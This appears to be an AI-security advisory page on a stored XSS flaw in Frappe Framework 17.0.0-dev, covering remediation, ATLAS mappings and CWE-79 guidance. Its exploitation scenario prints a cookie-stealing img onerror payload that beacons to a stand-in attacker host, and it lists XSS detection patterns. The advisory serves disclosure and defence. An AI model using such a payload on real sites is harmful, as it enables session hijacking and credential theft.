CVE-2026-50709: Stored XSS — AWAITING NVD

Q: Is CVE-2026-50709 actively exploited?

No confirmed active exploitation of CVE-2026-50709 has been reported, but organizations should still patch proactively.

Q: How to fix CVE-2026-50709?

1. Patch: Upgrade Frappe Framework beyond 17.0.0-dev once an official fix is released; track github.com/frappe/frappe for the remediation commit targeting CWE-79 in the Notifications Events panel. 2. Access restriction: Immediately restrict write permissions to the Notifications Events panel to a minimal set of trusted administrators using Frappe's role-based access control; remove the permission from all non-admin roles. 3. Content Security Policy: Enforce 'script-src self' and 'object-src none' at the Caddy or nginx reverse proxy level to contain XSS blast radius even if a payload reaches the database. 4. Detection: Query the Frappe database for notification event name or description fields containing '<script', 'onerror=', 'javascript:', 'eval(', or base64 payloads; alert on anomalous outbound HTTP requests originating from authenticated browser sessions. 5. Credential rotation: If exploitation is suspected, immediately rotate all API keys, session secrets, and AI service credentials accessible through the Frappe instance.

Q: What systems are affected by CVE-2026-50709?

This vulnerability affects the following AI/ML architecture patterns: Web-based AI interfaces, ML UI dashboards, Business application AI integrations, Frappe-backed agent workflow UIs, ERP systems with AI-augmented analytics.

Q: What is the CVSS score for CVE-2026-50709?

No CVSS score has been assigned yet.

CISO Take

A stored cross-site scripting vulnerability in Frappe Framework 17.0.0-dev allows any attacker with write access to the Notifications Events panel to persist malicious JavaScript that executes silently in every authenticated user's browser session, including administrators. While Frappe is not an AI-native framework, it underpins AI-enabled business applications—ERPNext deployments, custom LLM workflow tools, and ML dashboards—where a compromised admin session cascades to AI service API keys, training data credentials, and pipeline configuration access. No public exploit code, no CISA KEV listing, and absent EPSS data indicate limited near-term mass exploitation risk, but the trivially low attack bar (standard XSS toolkit, no AI/ML knowledge required) and persistent nature of the payload justify prompt remediation. Patch to a post-17.0.0-dev release when available, restrict Notifications panel write access to trusted administrators via Frappe RBAC, enforce a strict Content-Security-Policy header at the reverse proxy, and audit notification event fields for injected script patterns.

Sources: NVD ATLAS GitHub Advisory

What is the risk?

Medium overall risk. Exploitation requires attacker write-access to the Frappe notifications configuration, limiting opportunistic mass exploitation. However, once injected the payload executes persistently for all authenticated users with zero further attacker interaction—a high-value persistence primitive. The affected version is a development release (17.0.0-dev), which constrains production exposure in conservative environments, but organizations running bleeding-edge Frappe in staging, demo, or early-production deployments carrying AI service credentials face meaningful lateral-movement risk if an administrator session is harvested.

How does the attack unfold?

Initial Access

Attacker with write access to the Frappe Notifications Events panel injects a stored XSS payload—such as an onerror event handler or script tag—into an event name or description field without triggering sanitization.

AML.T0049

Persistence

The unsanitized payload is committed to the Frappe PostgreSQL database and will automatically execute in the browser context of every authenticated user who subsequently loads the Notifications Events panel.

AML.T0079

Credential Harvesting

The persisted script silently beacons session cookies, authentication tokens, or LLM API keys visible in the page DOM to an adversary-controlled endpoint, requiring no further user interaction beyond page load.

AML.T0055

Impact

With a harvested administrator session, the adversary reconfigures AI service API endpoints, exports datasets processed by AI workflows, rotates API keys to attacker-controlled values, or pivots to connected AI infrastructure using stolen credentials.

AML.T0025

Initial Access

Attacker with write access to the Frappe Notifications Events panel injects a stored XSS payload—such as an onerror event handler or script tag—into an event name or description field without triggering sanitization.

AML.T0049

Persistence

The unsanitized payload is committed to the Frappe PostgreSQL database and will automatically execute in the browser context of every authenticated user who subsequently loads the Notifications Events panel.

AML.T0079

Credential Harvesting

The persisted script silently beacons session cookies, authentication tokens, or LLM API keys visible in the page DOM to an adversary-controlled endpoint, requiring no further user interaction beyond page load.

AML.T0055

Impact

With a harvested administrator session, the adversary reconfigures AI service API endpoints, exports datasets processed by AI workflows, rotates API keys to attacker-controlled values, or pivots to connected AI infrastructure using stolen credentials.

AML.T0025

How severe is it?

CVSS 3.1

N/A

EPSS

N/A

Exploitation Status

No known exploitation

Sophistication

Trivial

What should I do?

5 steps

Patch: Upgrade Frappe Framework beyond 17.0.0-dev once an official fix is released; track github.com/frappe/frappe for the remediation commit targeting CWE-79 in the Notifications Events panel.
Access restriction: Immediately restrict write permissions to the Notifications Events panel to a minimal set of trusted administrators using Frappe's role-based access control; remove the permission from all non-admin roles.
Content Security Policy: Enforce 'script-src self' and 'object-src none' at the Caddy or nginx reverse proxy level to contain XSS blast radius even if a payload reaches the database.
Detection: Query the Frappe database for notification event name or description fields containing '<script', 'onerror=', 'javascript:', 'eval(', or base64 payloads; alert on anomalous outbound HTTP requests originating from authenticated browser sessions.
Credential rotation: If exploitation is suspected, immediately rotate all API keys, session secrets, and AI service credentials accessible through the Frappe instance.

How is it classified?

Data Extraction Auth Bypass Social Engineering Framework API AML.T0025 - Exfiltration via Cyber Means AML.T0049 - Exploit Public-Facing Application AML.T0055 - Unsecured Credentials

Which compliance frameworks are affected?

This CVE is relevant to:

EU AI Act

Art. 15 - Accuracy, robustness and cybersecurity

ISO 42001

A.8.4 - AI system risk management

NIST AI RMF

MS-2.5 - Practices and procedures are in place to address AI risks

OWASP LLM Top 10

LLM02:2025 - Sensitive Information Disclosure

Frequently Asked Questions

What is CVE-2026-50709?

A stored cross-site scripting vulnerability in Frappe Framework 17.0.0-dev allows any attacker with write access to the Notifications Events panel to persist malicious JavaScript that executes silently in every authenticated user's browser session, including administrators. While Frappe is not an AI-native framework, it underpins AI-enabled business applications—ERPNext deployments, custom LLM workflow tools, and ML dashboards—where a compromised admin session cascades to AI service API keys, training data credentials, and pipeline configuration access. No public exploit code, no CISA KEV listing, and absent EPSS data indicate limited near-term mass exploitation risk, but the trivially low attack bar (standard XSS toolkit, no AI/ML knowledge required) and persistent nature of the payload justify prompt remediation. Patch to a post-17.0.0-dev release when available, restrict Notifications panel write access to trusted administrators via Frappe RBAC, enforce a strict Content-Security-Policy header at the reverse proxy, and audit notification event fields for injected script patterns.

Is CVE-2026-50709 actively exploited?

No confirmed active exploitation of CVE-2026-50709 has been reported, but organizations should still patch proactively.

How to fix CVE-2026-50709?

1. Patch: Upgrade Frappe Framework beyond 17.0.0-dev once an official fix is released; track github.com/frappe/frappe for the remediation commit targeting CWE-79 in the Notifications Events panel. 2. Access restriction: Immediately restrict write permissions to the Notifications Events panel to a minimal set of trusted administrators using Frappe's role-based access control; remove the permission from all non-admin roles. 3. Content Security Policy: Enforce 'script-src self' and 'object-src none' at the Caddy or nginx reverse proxy level to contain XSS blast radius even if a payload reaches the database. 4. Detection: Query the Frappe database for notification event name or description fields containing '<script', 'onerror=', 'javascript:', 'eval(', or base64 payloads; alert on anomalous outbound HTTP requests originating from authenticated browser sessions. 5. Credential rotation: If exploitation is suspected, immediately rotate all API keys, session secrets, and AI service credentials accessible through the Frappe instance.

What systems are affected by CVE-2026-50709?

This vulnerability affects the following AI/ML architecture patterns: Web-based AI interfaces, ML UI dashboards, Business application AI integrations, Frappe-backed agent workflow UIs, ERP systems with AI-augmented analytics.

What is the CVSS score for CVE-2026-50709?

No CVSS score has been assigned yet.

What is the AI security impact?

Affected AI Architectures

Web-based AI interfacesML UI dashboardsBusiness application AI integrationsFrappe-backed agent workflow UIsERP systems with AI-augmented analytics

MITRE ATLAS Techniques

AML.T0025 Exfiltration via Cyber Means

AML.T0049 Exploit Public-Facing Application

AML.T0055 Unsecured Credentials

Compliance Controls Affected

EU AI Act: Art. 15

ISO 42001: A.8.4

NIST AI RMF: MS-2.5

OWASP LLM Top 10: LLM02:2025

What are the technical details?

Original Advisory

A Stored Cross-Site Scripting (XSS) vulnerability exists in Frappe Framework version 17.0.0-dev due to improper neutralization of user-controlled input in the Notifications > Events panel.

Exploitation Scenario

An adversary with low-privileged write access to a Frappe instance—obtained via a compromised support account, a misconfigured demo environment, or an insider—navigates to the Notifications Events panel and inserts a stored XSS payload into an event name or description field. The payload, for example an <img src=x onerror='fetch("https://attacker.io/exfil?c="+document.cookie)'> tag, is stored in the Frappe database without sanitization. Any authenticated user who subsequently views the Events panel—including system administrators—receives the malicious script and involuntarily beacons their session token to the attacker. In an AI/ML deployment context, the attacker reuses the harvested admin session to access Frappe system settings containing LLM provider API keys, reconfigure AI webhook endpoints to attacker-controlled URLs, or export dataset records processed by AI-augmented workflows—all without triggering further authentication challenges.

Weaknesses (CWE)

CWE-79 Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') CWE-79 Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting')

CWE-79 — Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting'): The product does not neutralize or incorrectly neutralizes user-controllable input before it is placed in output that is used as a web page that is served to other users.

[Architecture and Design] Use a vetted library or framework that does not allow this weakness to occur or provides constructs that make this weakness easier to avoid [REF-1482]. Examples of libraries and frameworks that make it easier to generate properly encoded output include Microsoft's Anti-XSS library, the OWASP ESAPI Encoding module, and Apache Wicket.
[Implementation, Architecture and Design] Understand the context in which your data will be used and the encoding that will be expected. This is especially important when transmitting data between different components, or when generating outputs that can contain multiple encodings at the same time, such as web pages or multi-part mail messages. Study all expected communication protocols and data representations to determine the required encoding strategies. For any data that will be output to another web page, especially any data that was received from external inputs, use the appropriate encoding on all non-alphanumeric characters. Parts of the same output document may require different encodings, which will vary depending on whether the output is in the: etc. Note that HTML Entity Encoding is only appropriate for the HTML body. Consult the XSS Prevention Cheat Sheet [REF-724] for more details on the types of encoding and escaping that are needed. HTML body Element attributes (such as src="XYZ") URIs JavaScript sections Casca

Source: MITRE CWE corpus.